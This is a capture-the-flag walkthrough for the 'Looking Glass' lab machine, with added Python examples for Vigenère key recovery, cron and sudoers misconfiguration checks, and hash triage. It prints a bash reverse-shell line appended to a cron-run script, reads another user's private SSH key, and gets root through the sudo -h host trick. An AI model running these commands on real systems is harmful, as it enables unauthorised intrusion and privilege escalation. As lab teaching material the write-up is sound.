Looking Glass
Basic Enumeration
nmap -vv -p- -oN nmap/ports $IP
This returns a lot: port 22 is open, plus a long run of high ports. Let's version-scan them all:
nmap -p- -vv -sV -oN nmap/all $IP
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9000/tcp open ssh syn-ack Dropbear sshd (protocol 2.0)
........
13999/tcp open ssh syn-ack Dropbear sshd (protocol 2.0)
Filter out the SSH lines to see what else is listening:
grep -iv ssh nmap/all
Returns:
PORT STATE SERVICE REASON VERSION
9100/tcp open jetdirect? syn-ack ttl 63
9101/tcp open jetdirect? syn-ack ttl 63
9102/tcp open jetdirect? syn-ack ttl 63
9103/tcp open jetdirect? syn-ack ttl 63
9104/tcp open jetdirect? syn-ack ttl 63
9105/tcp open jetdirect? syn-ack ttl 63
9106/tcp open jetdirect? syn-ack ttl 63
9107/tcp open jetdirect? syn-ack ttl 63
Delving deeper into the enumeration results (and enumerating further)
Checking my favorite pentesting/CTF resource for information on JetDirect (port 9100):
It turns out 9100 is Dropbear sshd as well; nmap only wrote "jetdirect?" because that is the well-known name for the port and none of its probes matched. Grabbing the banner confirms it:
nc -vn $IP 9100
(UNKNOWN) [10.10.235.132] 9100 (?) open
SSH-2.0-dropbear
BUT!
Ports 9101, 9102 and 9103 look different:
(UNKNOWN) [10.10.235.132] 9101 (bacula-dir) open
(UNKNOWN) [10.10.235.132] 9102 (bacula-fd) open
(UNKNOWN) [10.10.235.132] 9103 (bacula-sd) open
The names in parentheses are just nc looking the port numbers up in /etc/services, not a banner: nothing is printed on connect, which is also why nmap left them at "jetdirect?".
We'll skip this bacula stuff for now, and come back to it if needed.
Connecting to any of the Dropbear ports with a random user just prints "Lower" or "Higher", and the hint is reversed: the bottom of the range (9000) says "Lower" and the top (13999) says "Higher", so "Lower" means the real port is higher up. That is a binary search over the port range, and a short script can play the game for us:
#!/bin/bash
# Binary-search the Dropbear port range. Every decoy port answers "Lower" or
# "Higher" (reversed), the real one prints the riddle and asks for a secret.
user="alice"
host="${1:-$IP}"        # pass the target as the first argument or export IP
[[ -z $host ]] && { echo "usage: $0 <target>" >&2; exit 2; }
# ports may differ for you
min=9000
max=13999
while (( max - min > 1 )); do
    port=$(( min + (max - min) / 2 ))
    # stdin from /dev/null: the real service reads EOF at "Enter Secret:" and closes
    # instead of hanging; UserKnownHostsFile keeps a dozen host keys out of known_hosts
    response=$(ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
                   -o PasswordAuthentication=no -o BatchMode=yes -o ConnectTimeout=5 \
                   -p "$port" "$user@$host" 2>&1 </dev/null)
    echo "Port: $port Response: $response"
    if [[ $response == *"Lower"* ]]; then
        min=$port          # "Lower" really means: the real port is higher
    elif [[ $response == *"Higher"* ]]; then
        max=$port          # "Higher" really means: the real port is lower
    elif [[ $response == *"real service"* ]]; then
        echo "Correct port found: $port"
        exit 0
    else
        echo "Unexpected response on $port (timeout or connection error?), aborting." >&2
        exit 2
    fi
done
echo "Failed to find the correct port within the specified range."
exit 1
With stdin redirected from /dev/null the real service reads EOF at its "Enter Secret:" prompt, answers "Incorrect secret." and closes, so the script no longer hangs on the correct port; the full reply is printed and then the port is reported:
Port: 9611 Response: You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'
Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.
Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!
Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.
'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'
Wl ciskvttk me apw jzn.
'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Enter Secret: Incorrect secret.
Connection to 10.10.235.132 closed.
Correct port found: 9611
Decrypting the "ssh riddle"
We can use the following to detect what cipher it is:
After trying around with the same site and CyberChef I just searched for a Vigenère cracker and found this page:
Here the cipher cracks in under a second. I do not know whether that is because the text had already been decrypted earlier on that site or because the key is simply well known. A third explanation needs neither: the plaintext is Lewis Carroll's "Jabberwocky", so this is a known-plaintext problem and the key falls straight out of ciphertext minus plaintext. Either way, the secret is at the bottom of the deciphered text.
SSH to the riddle port again and enter the secret; the service returns user:password, and those credentials work for SSH on port 22.
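Added example, not part of the original writeup: the known-plaintext attack on this riddle. The ciphertext is the first stanza exactly as the service printed it above; the only assumed knowledge is the first line of Carroll's poem. Subtracting plaintext letters from ciphertext letters gives the running key, the shortest period that repeats is the key itself, and that key decrypts the rest of the stanza (which the recovery step never saw). Function names are mine.

```python
import string

ALPHA = string.ascii_uppercase

# Ciphertext: the first stanza exactly as the riddle service printed it (copied from the page).
STANZA = """'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql."""

# Known plaintext: the first line of Lewis Carroll's "Jabberwocky" (public domain).
KNOWN_FIRST_LINE = "'Twas brillig, and the slithy toves"


def letters(text):
    """Upper-cased A-Z only: a Vigenere key advances on letters, not on spaces or punctuation."""
    return [c.upper() for c in text if c.isalpha()]


def recover_shifts(ciphertext, plaintext):
    """Per-letter key shifts: key = (cipher - plain) mod 26."""
    pairs = zip(letters(ciphertext), letters(plaintext))
    return [(ALPHA.index(c) - ALPHA.index(p)) % 26 for c, p in pairs]


def recover_key(ciphertext, plaintext):
    """Return the key as letters: the shortest period that explains every recovered shift.

    With fewer known letters than one key length this returns the whole shift
    stream, so sanity-check the result against more ciphertext.
    """
    shifts = recover_shifts(ciphertext, plaintext)
    for period in range(1, len(shifts) + 1):
        if all(shifts[i] == shifts[i + period] for i in range(len(shifts) - period)):
            return "".join(ALPHA[s] for s in shifts[:period])


def vigenere_decrypt(ciphertext, key):
    """Decrypt preserving case and non-letters; the key index advances on letters only."""
    out, k = [], 0
    for ch in ciphertext:
        if ch.isalpha():
            shift = ALPHA.index(key[k % len(key)])
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            k += 1
        else:
            out.append(ch)
    return "".join(out)


if __name__ == "__main__":
    key = recover_key(STANZA.splitlines()[0], KNOWN_FIRST_LINE)
    print("recovered key:", key)          # THEALPHABETCIPHER
    print(vigenere_decrypt(STANZA, key))  # the first stanza of Jabberwocky
```

One line of known plaintext (28 letters) is enough here because the key is 17 letters long and repeats inside the sample; against a longer key you would feed the second line as well.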
Exploring the machine with the first user
Bash history lives in the abyss: ~/.bash_history is /dev/null, so there is no command history to read.
This is interesting:
sudo -l
Matching Defaults entries for jabberwock on looking-glass:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
Capabilities, nothing of interest:
getcap -r / 2>/dev/null
/usr/bin/mtr-packet = cap_net_raw+ep
Permissions are interesting again: jabberwock's home is world-writable, and alice's is world-executable (traversable, not listable), so files inside it can be read if their own mode allows:
ls -al /home
drwx--x--x 6 alice alice 4096 Jul 3 2020 alice
drwx------ 2 humptydumpty humptydumpty 4096 Jul 3 2020 humptydumpty
drwxrwxrwx 5 jabberwock jabberwock 4096 Nov 4 13:07 jabberwock
drwx------ 5 tryhackme tryhackme 4096 Jul 3 2020 tryhackme
drwx------ 3 tweedledee tweedledee 4096 Jul 3 2020 tweedledee
drwx------ 2 tweedledum tweedledum 4096 Jul 3 2020 tweedledum
cat /home/alice/.ssh/id_rsa
cat: /home/alice/.ssh/id_rsa: Permission denied
cat /home/alice/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGY+dwBeKw2NtTbGLN+3hpg+qZ9ebXvfkU+UZ/iP0TFmGWaYM0hFyE9oVSoldBmLmvJAfpjFk/kgglcQ0r5rhahEPI+jIYr/retdOf8hZYpCRr21DbGt2fLF3Bu2Io/Uvhur/i9Tc5RwD5pgfGqHKrf1qul5x4dWK36NU+uIeIIDveTuAcKCmTBZzM1rkwwaj7UKDiJ/N9+/i6E+TEEsuXd/isF/zhGa4oQTLpthn79Y4SAeV+SzmeAWeJbvHZHe/KrvHIOvCJcSN9bjJh76QuIZnLKTWJrscaE0qkhG5890l1P6s0auNgUuOHN5ZgGYfHsmSGQRQUhXHplXXL6CKF alice@looking-glass
That looks promising: an id_rsa.pub means the matching private key sits right next to it. We cannot read it yet, but remember it for later.
ls -al ~
-rw-rw-r-- 1 jabberwock jabberwock 935 Jun 30 2020 poem.txt
-rwxrwxr-x 1 jabberwock jabberwock 85 Nov 4 14:05 twasBrillig.sh
-rw-r--r-- 1 jabberwock jabberwock 38 Jul 3 2020 user.txt
Yay, the user flag.
cat user.txt
The flag is stored reversed; use CyberChef or Python to reverse it.
Linpeas
CRON:
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
Sudoers:
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
Sudoers file: /etc/sudoers.d/alice is readable
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
The @reboot job runs twasBrillig.sh as tweedledum, the script lives in jabberwock's world-writable home and is writable by us, and sudo lets us reboot. So: append a reverse shell to the script and trigger it with a reboot:
echo '/bin/bash -i >& /dev/tcp/<yourip>/<yourport> 0>&1' >> /home/jabberwock/twasBrillig.sh
Setting up the listener:
nc -lnvp <yourport>
Rebooting and waiting:
sudo /sbin/reboot
After the reboot I noticed that the jabberwock password as well as the riddle port had changed; the secret stays the same though. So if you need the first user again, just run the port search once more and enter the secret.
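Added example (mine, not the author's): the check behind this step, generalised. It parses system-crontab entries (the /etc/crontab and /etc/cron.d format with a user field, which is what linpeas printed) and reports jobs another user runs whose script is writable by us, or sits in a world-writable directory without the sticky bit so it can be replaced even when the file's own mode is strict (jabberwock's home is 777 above). stage_demo() rebuilds the relevant paths in a scratch directory so it runs offline; the crontab text and the second, root-owned job are constructed.

```python
import os
import tempfile

# System-crontab syntax (/etc/crontab, /etc/cron.d/*): schedule, user, command.
# Constructed sample: the first job is the entry linpeas reported on the page, the second
# is a made-up root job whose script does not exist in the staged tree, for contrast.
CRONTAB = """# m h dom mon dow user command
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
0 * * * * root /usr/local/bin/backup.sh
"""

SPECIALS = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly", "@daily", "@hourly"}


def parse_system_crontab(text):
    """Yield (schedule, user, command) for each job line; skips comments and VAR=value lines."""
    for line in text.splitlines():
        parts = line.split()
        if not parts or parts[0].startswith("#") or "=" in parts[0]:
            continue
        if parts[0] in SPECIALS and len(parts) >= 3:
            yield parts[0], parts[1], " ".join(parts[2:])
        elif len(parts) >= 7:
            yield " ".join(parts[:5]), parts[5], " ".join(parts[6:])


def script_paths(command):
    """Absolute paths in the command; with 'bash /path/x.sh' the argument is what gets executed."""
    return [tok for tok in command.split() if tok.startswith("/")]


def writable_cron_targets(text, root="/"):
    """Return (schedule, user, path, reasons) for jobs whose script we can modify or replace.

    `root` lets the check run against a staged directory tree instead of the live filesystem.
    Two conditions are reported: the file is writable by us, or its directory is world-writable
    without the sticky bit, so the file can be renamed away and replaced regardless of its mode.
    """
    findings = []
    for schedule, user, command in parse_system_crontab(text):
        for path in script_paths(command):
            real = os.path.join(root, path.lstrip("/"))
            if not os.path.isfile(real):
                continue
            reasons = []
            if os.access(real, os.W_OK):
                reasons.append("file writable")
            mode = os.stat(os.path.dirname(real)).st_mode
            if mode & 0o002 and not mode & 0o1000:   # S_IWOTH set, S_ISVTX clear
                reasons.append("directory world-writable, not sticky (file can be replaced)")
            if reasons:
                findings.append((schedule, user, path, reasons))
    return findings


def stage_demo():
    """Recreate the relevant part of the box in a scratch tree and run the check against it."""
    root = tempfile.mkdtemp()
    home = os.path.join(root, "home", "jabberwock")
    os.makedirs(home)
    script = os.path.join(home, "twasBrillig.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\necho \"'Twas brillig\"\n")
    os.chmod(script, 0o775)   # -rwxrwxr-x jabberwock, as listed on the page
    os.chmod(home, 0o777)     # drwxrwxrwx, as listed on the page
    return writable_cron_targets(CRONTAB, root=root)


if __name__ == "__main__":
    for finding in stage_demo():
        print(finding)
```

On a live box call writable_cron_targets() on the concatenated contents of /etc/crontab and /etc/cron.d/*; per-user crontabs in /var/spool/cron have no user field and are not handled here.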
Exploring the machine with the second user
First we upgrade the reverse shell to a proper TTY (for a detailed explanation check out this site):
python3 -c 'import pty;pty.spawn("/bin/bash")'
# press ctrl+z
stty raw -echo; fg
export TERM=xterm
Enumerate manually
Remember the unreadable private key in alice's home? Same here: tweedledum cannot read it either.
ls -al
-rw-r--r-- 1 root root 520 Jul 3 2020 humptydumpty.txt
-rw-r--r-- 1 root root 296 Jul 3 2020 poem.txt
sudo -l
Matching Defaults entries for tweedledum on looking-glass:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tweedledum may run the following commands on looking-glass:
(tweedledee) NOPASSWD: /bin/bash
cat humptydumpty.txt
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9:maybe
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed:one
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624:of
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f:these
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6:is
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0:the
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8:password
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
cat poem.txt
'Tweedledum and Tweedledee
Agreed to have a battle;
For Tweedledum said Tweedledee
Had spoiled his nice new rattle.
Just then flew down a monstrous crow,
As black as a tar-barrel;
Which frightened both the heroes so,
They quite forgot their quarrel.'
We could switch to tweedledee via sudo, but, as in the book, the two are twins: nothing new there.
The poem does not help either.
So we take the 64-hex-character fields from humptydumpty.txt and throw them at hashcat.
They look like SHA-256. hashcat -m 1400 expects bare digests and rejects the ":word" suffix (and --username will not help, it expects the name before the hash), so strip it first:
cut -d: -f1 humptydumpty.txt > hashes.txt
hashcat -m 1400 hashes.txt /path/to/your/favorite/wordlist
Right off the bat four hashes crack; from there the two missing words can be guessed to complete the sentence, which leaves one line.
Looking closely at that last "hash", its structure is off (it took me a while to see it): every byte pair falls in the printable-ASCII range 0x20-0x7e, which the 32 roughly uniform bytes of a real SHA-256 digest practically never all do.
It is hex-encoded text, not a hash.
CyberChef -> From Hex does the trick: a new password!
The password cannot be used over SSH, only to switch user:
su humptydumpty
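Added example, not part of the original writeup: a triage pass over humptydumpty.txt (copied from the listing above) that does by hand what a practitioner checks before reaching for hashcat. For the seven "digest:word" lines it tests whether the suffix is the preimage of its own digest (sha256("password") is the familiar 5e884898...), and for the odd line it applies the printable-ASCII test that separates hex-encoded text from a real digest. Function names are mine.

```python
import hashlib

# humptydumpty.txt as shown above (constructed copy of the page's listing).
HUMPTYDUMPTY = """dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9:maybe
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed:one
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624:of
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f:these
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6:is
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0:the
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8:password
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b"""


def is_printable_ascii(raw: bytes) -> bool:
    """32 bytes all inside 0x20-0x7e are text, not a digest: SHA-256 output is roughly
    uniform, so the chance of that happening by accident is about (95/256)**32."""
    return all(0x20 <= b <= 0x7E for b in raw)


def triage_line(line: str):
    """Classify one line of the file.

    ("sha256", word, verified)  - a 'digest:word' line; verified is whether sha256(word) == digest
    ("hex-text", decoded)       - 64 hex chars that decode to printable ASCII
    ("unknown", field)          - anything else (not hex, wrong length, non-text bytes)
    """
    field, _, suffix = line.strip().partition(":")
    try:
        raw = bytes.fromhex(field)
    except ValueError:
        return ("unknown", field)
    if len(raw) != 32:
        return ("unknown", field)
    if suffix:
        return ("sha256", suffix, hashlib.sha256(suffix.encode()).hexdigest() == field.lower())
    if is_printable_ascii(raw):
        return ("hex-text", raw.decode("ascii"))
    return ("unknown", field)


def triage(text: str):
    return [triage_line(line) for line in text.splitlines() if line.strip()]


if __name__ == "__main__":
    for item in triage(HUMPTYDUMPTY):
        print(item)
```

If every "sha256" entry comes back verified, the words after the colons already spell the sentence and hashcat was never needed; either way the eighth line is the one worth decoding.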
Exploring the machine with the third user
Here we can finally do what we have been waiting for!
cat /home/alice/.ssh/id_rsa
Copy the key into a local file:
vi id_rsa
Restrict its permissions; ssh refuses a private key that is readable by group or others:
chmod 600 id_rsa
SSH as alice
ssh -i id_rsa alice@$IP
Exploring the machine with the fourth user
Nothing interesting in alice's home, just another txt file with a story.
But we found something earlier with the first user:
Sudoers file: /etc/sudoers.d/alice is readable
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
alice may run /bin/bash as root, but only on the host ssalg-gnikool, which is our hostname backwards...well...
Plainly this does not work, because sudoers matches the host field against our actual hostname, "looking-glass", and that cannot be changed without root:
sudo /bin/bash
After researching how to change or spoof the hostname without success, I went through the sudo man page to see if there was anything there...
And there literally is a flag to set the host: -h host (--host=host) runs the command on the named host if the policy plugin supports remote commands. The sudoers plugin cannot run anything remotely, but it still matches the rule against the host you name and then runs the command locally:
sudo -h ssalg-gnikool /bin/bash
Even if this throws an error, it escalates to root!
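Added example, not from the page: a minimal parser for "user host = (runas) TAG: command" lines that flags rules scoped to a host other than the current one, since sudo -l only lists what applies to the local hostname and a readable /etc/sudoers.d/ is the only place such a rule shows up. The sudoers text is constructed from the two rules the page reports (the jabberwock rule rewritten from sudo -l output into sudoers syntax is my reconstruction); aliases and line continuations are not handled.

```python
import re
import socket

# Constructed sudoers text: the alice rule exactly as linpeas printed it above, and the
# jabberwock rule rewritten from `sudo -l` output into sudoers syntax (my reconstruction).
SUDOERS = """# /etc/sudoers.d/* as readable on the box (constructed)
jabberwock ALL=(root) NOPASSWD: /sbin/reboot
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
"""

# user  host = (runas) TAG: TAG: commands   (no aliases, no '\' continuation lines)
RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^\s=]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<commands>.+)$"
)


def parse_sudoers(text):
    """Parse user specifications into dicts; Defaults, comments and unmatched lines are skipped."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or line.startswith("Defaults"):
            continue
        m = RULE.match(line)
        if not m:
            continue
        tags = [t for t in re.split(r":\s*", m["tags"]) if t]
        rules.append({"user": m["user"], "host": m["host"], "runas": m["runas"] or "root",
                      "tags": tags, "commands": m["commands"].strip()})
    return rules


def host_scoped_rules(rules, current_host):
    """Rules that `sudo -l` hides on this machine because their host field names another host.

    sudoers compares the host field with the name passed via `sudo -h host`, and since the
    sudoers plugin cannot run commands remotely, a matching rule runs the command locally.
    Returns (user, host, runas, commands, command-to-try) tuples.
    """
    found = []
    for r in rules:
        if r["host"] not in ("ALL", current_host):
            found.append((r["user"], r["host"], r["runas"], r["commands"],
                          f"sudo -h {r['host']} {r['commands']}"))
    return found


if __name__ == "__main__":
    for hit in host_scoped_rules(parse_sudoers(SUDOERS), socket.gethostname()):
        print(hit)
```

Run it over whatever sudoers fragments are readable (cat /etc/sudoers.d/* 2>/dev/null); any hit is a candidate for the -h trick above, subject to the rule's user matching your account.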
cat the root.txt and reverse it like the user.txt before!